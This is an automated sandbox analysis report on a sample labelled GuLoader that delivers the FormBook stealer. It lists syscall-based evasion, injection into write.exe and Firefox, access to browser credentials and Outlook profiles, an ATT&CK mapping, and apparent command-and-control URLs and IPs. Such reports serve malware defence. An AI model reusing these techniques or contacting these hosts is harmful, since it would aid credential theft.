        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryInformationToken: Direct from: 0x77A92BCCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtOpenFile: Direct from: 0x77A92CECJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtCreateFile: Direct from: 0x77A92F0CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtAllocateVirtualMemory: Direct from: 0x77A92B0CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtOpenSection: Direct from: 0x77A92D2CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryVolumeInformationFile: Direct from: 0x77A92E4CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtDeviceIoControlFile: Direct from: 0x77A92A0CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQuerySystemInformation: Direct from: 0x77A947ECJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryAttributesFile: Direct from: 0x77A92D8CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtSetInformationThread: Direct from: 0x77A92A6CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtSetInformationThread: Direct from: 0x77A86319Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtCreateKey: Direct from: 0x77A92B8CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtClose: Direct from: 0x77A92A8C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtAllocateVirtualMemory: Direct from: 0x77A9480CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtProtectVirtualMemory: Direct from: 0x77A92EBCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtWriteVirtualMemory: Direct from: 0x77A9482CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtOpenKeyEx: Direct from: 0x77A92ABCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtCreateUserProcess: Direct from: 0x77A9363CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQueryInformationProcess: Direct from: 0x77A92B46Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtResumeThread: Direct from: 0x77A92EDCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtDelayExecution: Direct from: 0x77A92CFCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 7336Jump to behavior
        Source: C:\Users\user\Desktop\Nondesistance.exeProcess created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"Jump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager&
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,4_2_00405D51

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		11
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts212
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		212
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447915 Sample: Nondesistance.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 34 www.wp-bits.online 2->34 36 www.weave.game 2->36 38 33 other IPs or domains 2->38 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for URL or domain 2->50 52 4 other signatures 2->52 10 Nondesistance.exe 3 24 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 10->26 dropped 13 Nondesistance.exe 6 10->13         started        process6 dnsIp7 40 drive.google.com 142.251.16.101, 443, 49827 GOOGLEUS United States 13->40 42 drive.usercontent.google.com 172.253.62.132, 443, 49828 GOOGLEUS United States 13->42 62 Maps a DLL or memory area into another process 13->62 17 jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe 13->17 injected signatures8 process9 dnsIp10 28 www.funtechie.top 203.161.49.193, 49843, 49844, 49845 VNPT-AS-VNVNPTCorpVN Malaysia 17->28 30 academynadpo.ru 185.215.4.19, 49912, 49913, 49914 TVHORADADAES Denmark 17->30 32 12 other IPs or domains 17->32 44 Found direct / indirect Syscall (likely to bypass EDR) 17->44 21 write.exe 13 17->21         started        signatures11 process12 signatures13 54 Tries to steal Mail credentials (via file / registry access) 21->54 56 Tries to harvest and steal browser information (history, passwords, etc) 21->56 58 Modifies the context of a thread in another process (thread injection) 21->58 60 Maps a DLL or memory area into another process 21->60 24 firefox.exe 21->24         started        process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Nondesistance.exe50%ReversingLabsWin32.Trojan.GuLoader
        Nondesistance.exe57%VirustotalBrowse
        Nondesistance.exe100%AviraHEUR/AGEN.1331786

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.uhahiq.com/udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%Avira URL Cloudsafe
        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
        https://assets.iv.lt/header.html0%Avira URL Cloudsafe
        http://goge8opp.com:3010%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        https://ogp.me/ns#0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://www.iv.lt/domenai/0%Avira URL Cloudsafe
        https://www.namesilo.com0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
        http://www.donantedeovulos.space/udud/100%Avira URL Cloudmalware
        http://www.osbornesargent.co.uk/udud/0%Avira URL Cloudsafe
        https://www.google.com0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e9570%Avira URL Cloudsafe
        https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature0%Avira URL Cloudsafe
        https://assets.iv.lt/images/thumbnail.png0%Avira URL Cloudsafe
        https://www.iv.lt/duomenu-centras/0%Avira URL Cloudsafe
        http://www.lm2ue.us/udud/0%Avira URL Cloudsafe
        http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0Lvbc0%Avira URL Cloudsafe
        http://www.mindfreak.live/0%Avira URL Cloudsafe
        https://www.iv.lt/profesionalus-hostingas/0%Avira URL Cloudsafe
        https://www.namesilo.com/domain/search-domains?query=lm2ue.us0%Avira URL Cloudsafe
        https://www.valentinaetommaso.it/page-not-found-404/0%Avira URL Cloudsafe
        https://assets.iv.lt/footer.html0%Avira URL Cloudsafe
        https://login.li0%Avira URL Cloudsafe
        http://tilda.cc0%Avira URL Cloudsafe
        http://www.fivetownsjcc.com/udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=0%Avira URL Cloudsafe
        http://www.noispisok.com/udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net0%Avira URL Cloudsafe
        http://www.academynadpo.ru/udud/0%Avira URL Cloudsafe
        https://www.iv.lt/0%Avira URL Cloudsafe
        https://www.gandi.net/en/domain0%Avira URL Cloudsafe
        http://tilda.ws/img/logo404.png0%Avira URL Cloudsafe
        https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
        http://www.valentinaetommaso.it/udud/0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.uhahiq.com/udud/0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        https://www.iv.lt/vps-serveriai/0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e9570%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e9570%Avira URL Cloudsafe
        https://klientams.iv.lt/0%Avira URL Cloudsafe
        http://www.mindfreak.live/udud/0%Avira URL Cloudsafe
        http://www.mindfreak.live/udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        http://www.wp-bits.online/udud/0%Avira URL Cloudsafe
        https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campa0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e9570%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.grimfilm.co.kr/udud/0%Avira URL Cloudsafe
        https://www.namesilo.com/domain/search-domains?query=l7aeh.us0%Avira URL Cloudsafe
        http://www.wp-bits.online/udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE=0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e9570%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.academynadpo.ru/udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpF0%Avira URL Cloudsafe
        https://events.webnode.com/projects/-/events/0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e9570%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e9570%Avira URL Cloudsafe
        https://assets.iv.lt/default.css0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        https://assets.iv.lt/images/icon.png0%Avira URL Cloudsafe
        http://www.gaglianoart.com/udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8=0%Avira URL Cloudsafe
        http://www.avocatmh.org/udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        http://www.avocatmh.org/udud/0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        https://drive.usercontent.google.com/x0%Avira URL Cloudsafe
        https://apis.google.com0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.lm2ue.us/udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        https://www.iv.lt/talpinimo-planai/0%Avira URL Cloudsafe
        https://whois.gandi.net/en/results?search=avocatmh.org0%Avira URL Cloudsafe
        https://img.sedoparking.com/templates/bg/NameSiloLogo.png0%Avira URL Cloudsafe
        http://www.maxiwalls.com/udud/0%Avira URL Cloudsafe
        http://www.noispisok.com/udud/0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.maxiwalls.com/udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        https://drive.usercontent.google.com/0%Avira URL Cloudsafe
        https://drive.google.com/Hd0%Avira URL Cloudsafe
        https://www.iv.lt/neribotas-svetainiu-talpinimas/0%Avira URL Cloudsafe
        https://www.iv.lt/el-pasto-filtras/0%Avira URL Cloudsafe
        https://www.iv.lt/svetainiu-kurimo-irankis/0%Avira URL Cloudsafe
        http://www.l7aeh.us/udud/0%Avira URL Cloudsafe
        https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
        https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
        http://www.osbornesargent.co.uk0%Avira URL Cloudsafe
        http://www.grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        http://www.donantedeovulos.space/udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG100%Avira URL Cloudmalware
        https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.l7aeh.us/udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        http://www.funtechie.top/udud/0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.fivetownsjcc.com/udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        webredir.vip.gandi.net
        		217.70.184.50
        		truetrue
          		unknown
          www.gast.com.pl
          		185.253.215.17
          		truetrue
            		unknown
            osbornesargent.co.uk
            		76.223.67.189
            		truetrue
              		unknown
              www.maxiwalls.com
              		79.98.25.1
              		truetrue
                		unknown
                noispisok.com
                		84.32.84.32
                		truetrue
                  		unknown
                  www.l7aeh.us
                  		91.195.240.123
                  		truetrue
                    		unknown
                    academynadpo.ru
                    		185.215.4.19
                    		truetrue
                      		unknown
                      www.lm2ue.us
                      		91.195.240.123
                      		truetrue
                        		unknown
                        drive.usercontent.google.com
                        		172.253.62.132
                        		truefalse
                          		unknown
                          lb.webnode.io
